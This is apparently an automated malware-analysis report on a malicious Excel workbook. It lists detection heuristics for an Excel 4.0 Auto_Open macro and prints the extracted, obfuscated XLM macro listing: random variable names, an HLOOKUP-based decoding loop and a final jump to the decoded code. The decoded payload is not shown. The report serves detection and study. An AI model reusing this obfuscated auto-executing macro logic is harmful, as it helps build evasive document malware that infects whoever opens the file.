MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6768 bytes |
SHA-256: 4fc10d3e4a1fedf34b495d4752fa67aa7cce1742fda04d635a72692b0e611859 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 17 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - qikWPpVW
' 0018 21 LABEL : Cell Value, String Constant - AHvhFb len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G172
' 0018 21 LABEL : Cell Value, String Constant - cgISsm len=0
' 0018 27 LABEL : Cell Value, String Constant - EAfNhxVPgTyD len=0
' 0018 25 LABEL : Cell Value, String Constant - ebbvQuUNnG len=0
' 0018 27 LABEL : Cell Value, String Constant - fdauvlTeZzdv len=0
' 0018 24 LABEL : Cell Value, String Constant - hCYQDQpYY len=0
' 0018 22 LABEL : Cell Value, String Constant - hDVJKTJ len=0
' 0018 23 LABEL : Cell Value, String Constant - kelmEava len=0
' 0018 22 LABEL : Cell Value, String Constant - lhFsyTB len=0
' 0018 27 LABEL : Cell Value, String Constant - nayndhveRckx len=0
' 0018 27 LABEL : Cell Value, String Constant - NSbnVMPmZiBJ len=0
' 0018 24 LABEL : Cell Value, String Constant - qIskjLPws len=0
' 0018 26 LABEL : Cell Value, String Constant - SxrvRIZWiYZ len=0
' 0018 21 LABEL : Cell Value, String Constant - wiAlrY len=0
' 0018 22 LABEL : Cell Value, String Constant - YchywBj len=0
' 0018 24 LABEL : Cell Value, String Constant - YYUVIzhyy len=0
' 0018 26 LABEL : Cell Value, String Constant - zERjMuEGocm len=0
' 0018 23 LABEL : Cell Value, String Constant - ZFTtpXSk len=0
' 0018 21 LABEL : Cell Value, String Constant - zoGYqR len=0
' 0018 26 LABEL : Cell Value, String Constant - ZXfgLUsLDDQ len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' qikWPpVW,P86,"",949.00000000000000000000
' qikWPpVW,P87,"",322.00000000000000000000
' qikWPpVW,P88,"",107.00000000000000000000
' qikWPpVW,P89,"",328.00000000000000000000
' qikWPpVW,P90,"",327.00000000000000000000
' qikWPpVW,P91,"",-123.00000000000000000000
' qikWPpVW,G93,"SET.NAME("zERjMuEGocm",0+VALUE("0"))",""
' qikWPpVW,G95,"SET.NAME("lhFsyTB",zERjMuEGocm)",""
' qikWPpVW,G97,"SET.NAME("kelmEava",zERjMuEGocm)",""
' qikWPpVW,G102,"SET.NAME("YchywBj",COUNTA(cgISsm))",""
' qikWPpVW,G105,"SET.NAME("YYUVIzhyy",COUNTA(wiAlrY))",""
' qikWPpVW,G108,[],""
' qikWPpVW,G110,"SET.NAME("ZXfgLUsLDDQ","")",""
' qikWPpVW,G112,"lhFsyTB",""
' qikWPpVW,G115,"SET.NAME("qIskjLPws",HLOOKUP("*",cgISsm,lhFsyTB,FALSE))",""
' qikWPpVW,G120,"ebbvQuUNnG",""
' qikWPpVW,G123,"SET.NAME("NSbnVMPmZiBJ",zERjMuEGocm)",""
' qikWPpVW,G125,[],""
' qikWPpVW,G129,"NSbnVMPmZiBJ",""
' qikWPpVW,G131,"fdauvlTeZzdv",""
' qikWPpVW,G134,"SxrvRIZWiYZ",""
' qikWPpVW,G138,"hDVJKTJ",""
' qikWPpVW,G141,"SET.NAME("nayndhveRckx",VALUE(HLOOKUP("*",wiAlrY,hDVJKTJ,FALSE)))",""
' qikWPpVW,G144,"hCYQDQpYY",""
' qikWPpVW,G147,"ZXfgLUsLDDQ",""
' qikWPpVW,G151,"kelmEava",""
' qikWPpVW,G154,NEXT(),""
' qikWPpVW,G156,"EAfNhxVPgTyD",""
' qikWPpVW,G158,[],""
' qikWPpVW,G160,"zoGYqR",""
' qikWPpVW,G165,NEXT(),""
' qikWPpVW,G167,RETURN(),""
' qikWPpVW,G196,"SET.NAME("ZFTtpXSk",G93)",""
' qikWPpVW,G199,"cgISsm",""
' qikWPpVW,G201,"SET.NAME("wiAlrY",R41C13)",""
' qikWPpVW,G204,"SET.NAME("zoGYqR",213)",""
' qikWPpVW,G208,"SET.NAME("AHvhFb",7)",""
' qikWPpVW,G212,ZFTtpXSk(),""
' qikWPpVW,G213,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.